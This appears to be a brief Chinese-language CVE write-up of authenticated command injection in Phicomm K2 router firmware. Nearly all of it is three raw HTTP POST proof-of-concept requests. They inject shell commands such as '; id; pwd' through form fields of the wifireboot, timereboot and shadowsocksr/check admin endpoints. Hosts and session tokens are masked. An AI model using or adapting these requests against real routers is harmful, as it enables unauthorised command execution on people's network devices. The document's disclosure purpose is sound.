CVE作者：Phicomm k2 V22.6.529.216，其他系列产品暂时未验证。本人验证：其他版本也存在，只要漏洞接口存在，就有可能存在漏洞。部分接口或者版本执行payload后，返回包中没有执行结果。

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxa404162/admin/wifireboot HTTP/1.1Host: xxx.xxx.xxxContent-Length: 566Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://xxx.xxx.xxxContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMxXftWGyzoxhV5ccUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxa404162/admin/wifiset/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: sysauth=xxxxxxxxxxxxxxxxxxxxxxxxxxsec-ch-ua-platform: "Windows"sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: close
------WebKitFormBoundaryMxXftWGyzoxhV5ccContent-Disposition: form-data; name="wifiRebootEnablestatus"
%s------WebKitFormBoundaryMxXftWGyzoxhV5ccContent-Disposition: form-data; name="wifiRebootrange"
12:00; id; pwd------WebKitFormBoundaryMxXftWGyzoxhV5ccContent-Disposition: form-data; name="wifiRebootendrange"
%s:------WebKitFormBoundaryMxXftWGyzoxhV5ccContent-Disposition: form-data; name="cururl2"
http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxa4053a404162/admin/wifiset/------WebKitFormBoundaryMxXftWGyzoxhV5cc--

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxa404162/admin/timereboot HTTP/1.1Host: xxx.xxx.xxxContent-Length: 458Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://xxx.xxx.xxxContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9LxasH5JIOWajicUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxa404162/admin/wifiset/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: sysauth=xxxxxxxxxxxxxxxxxxxxxxxxsec-ch-ua-platform: "Windows"sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: close
------WebKitFormBoundaryU9LxasH5JIOWajicContent-Disposition: form-data; name="timeRebootEnablestatus"
on------WebKitFormBoundaryU9LxasH5JIOWajicContent-Disposition: form-data; name="timeRebootrange"
00:05; id ; pwd------WebKitFormBoundaryU9LxasH5JIOWajicContent-Disposition: form-data; name="cururl"
http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxa4053a404162/admin/wifiset/------WebKitFormBoundaryU9LxasH5JIOWajic--

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxxxxx04162/admin/shadowsocksr/check HTTP/1.1Host: xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9LxasH5JIOWajicReferer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxa404162/admin/shadowsocksr/statusAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: sysauth=xxxxxxxxxxxxxxxxxxxxsec-ch-ua-platform: "Windows"sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: closeContent-Length: 143
------WebKitFormBoundaryU9LxasH5JIOWajicContent-Disposition: form-data; name="set"
;id;------WebKitFormBoundaryU9LxasH5JIOWajic